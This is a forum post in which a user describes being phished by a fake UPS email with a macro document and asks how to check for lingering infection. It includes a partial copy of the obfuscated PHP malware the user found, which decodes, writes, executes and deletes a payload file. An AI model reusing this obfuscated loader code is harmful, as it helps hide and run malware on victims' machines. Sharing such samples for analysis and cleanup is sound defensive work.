cavemanager

I clicked the link in my email and the file just downloaded/ran. I didn't manually go out to a website to download it. Like I said, the email looked really legit and I just happened to be waiting for a package from UPS. Plus, this was before I had coffee.. Looking back, I should have hovered over the link to see the real destination. Live and learn.

I'm not just downloading random files from the Internet. I am usually careful about these things but it just so happened that I have UPS orders and the email looked legit. I don't know if you've heard, but even knowledgeable people can be tricked too. I did immediately disconnect from the network and do some file copies just in case. Meanwhile, Trend eventually grabbed the virus and I think I stopped it before it could do any damage. I am planning to wipe and re-install just because I know it's the best thing to do.

I figured.. any way to check where/what else got added to my pc? I have Trend Mirco AV as well as Malwarebytes.. I've done scans but nothing turned up...

I foolishly clicked a link in an email from what I thought was UPS (with a tracking number) and the link was a doc file with macros.. I noticed on system startup that I was seeing a PHP popup in the lower task bar. I then went to my local AppData\Roaming to find a suspicious folder with a php.exe file, a dll and a php script. I opened the PHP file in npp to have a look. I have very little experience with PHP so I can't really tell what the script is doing. Here is a copy/paste -- and I removed a little less than half the code just in case I am actually posting malicious code to this forum.. If I had to guess, I'd say it looks like it's doing encryption, so it's ransomware.. Script: <?php $GLOBALS['38744245'] = Array( 'cu' . 'rl_multi_exec', 'm' . 'ss' . 'ql_re' . 's' . 'ult', 'file_ge' . 't' . '_c' . 'on' . 'te' . 'nts', '' . 'fi' . 'l' . 'e_put_co' . 'n' . 't' . 'ents', 'ex' . 'ec', '' . 'unlink', '' . 'strpos', 'fg' . 'etcs' . 'v', 'strnat' . 'cmp', 'strlen', 'm' . 't_' . 'rand', 'p' . 're' . 'g_repla' . 'ce_callb' . 'ack', 'ch' . 'r', 'ord', 'st' . 'r' . 'po' . 's', 'array_' . 'fi' . 'lter', 's' . 'e' . 'ssion_is_r' . 'egist' . 'ered', 's' . 't' . 'rpos', 'cr' . 'eate_func' . 'tion', 'i' . 'm' . 'agecreatefrom' . 'gd2part', 'mt_' . 'rand' ); ?><?php function _1369297363($taqqmn) { $cabbfl = Array( "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e", "\xb0\x25\x64\xf2\x87\x45\x4b\xdb\xa9\x45\x52\xcc\x93\x56\x67\xeb\x87\x53\x78\xca\x8c\x45\x61\xfe\x96\x44\x53\xc4\x94\x41\x63\xfb\x93\x52\x2c\xda\x97\x74\x33\xc5\x8c\x5c\x23\x9f\x86\x5f\x2e\x9c\x9a\x53\x21", 'i', 'bxhndsxsexibrxben', 'gdz', '', 'lxdgilfgvccek', 'vz' ); return $cabbfl[$taqqmn]; } ?><?php $ucdxetr = round(0 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.8 + 101392739.; while (round(0 + 3693) - round(0 + 923.25 + 923.25 + 923.25 + 923.25)) $GLOBALS['38744245'][0]($yfvmrsd, $rgyctvo, $hdoptxm); $ovehlgp = _1369297363(0); $czdwupq = _1369297363(1); while (round(0 + 369.33333333333 + 369.33333333333 + 369.33333333333) - round(0 + 221.6 + 221.6 + 221.6 + 221.6 + 221.6)) $GLOBALS['38744245'][1]($acdfplp, $rgyctvo, $ghktwqf); $ovehlgp = gnnnesr($ovehlgp, $ucdxetr); $czdwupq = gnnnesr($czdwupq, $ucdxetr); $yxfgkhr = $GLOBALS['38744245'][2]($ovehlgp); if ($yxfgkhr) { $ghktwqf = gnnnesr($yxfgkhr, $ucdxetr); $GLOBALS['38744245'][3]($czdwupq, $ghktwqf); $GLOBALS['38744245'][4]($czdwupq); while (!$GLOBALS['38744245'][5]($czdwupq)) Sleep(round(0 + 1)); $ptdybmu = _1369297363(2); } function tpugtze($acdfplp, $gsseqei) { $wexiboc = $gsseqei & round(0 + 7.75 + 7.75 + 7.75 + 7.75); if ($GLOBALS['38744245'][6](_1369297363(3), _1369297363(4)) !== false) $GLOBALS['38744245'][7]($yfvmrsd, $ucdxetr, $ucdxetr, $czdwupq); return ($acdfplp << $wexiboc) | (($acdfplp >> (round(0 + 10.666666666667 + 10.666666666667 + 10.666666666667) - $wexiboc)) & ((round(0 + 1) << (round(0 + 7.75 + 7.75 + 7.75 + 7.75) & $wexiboc)) - round(0 + 0.2 + 0.2 + 0.2 + 0.2 + 0.2))); } function gnnnesr($rgyctvo, $ucdxetr) { $qaptxjz = _1369297363(5); while (round(0 + 3667) - round(0 + 3667)) $GLOBALS['38744245'][8]($yxfgkhr); [END PORTION OF CODE REMOVED] ?>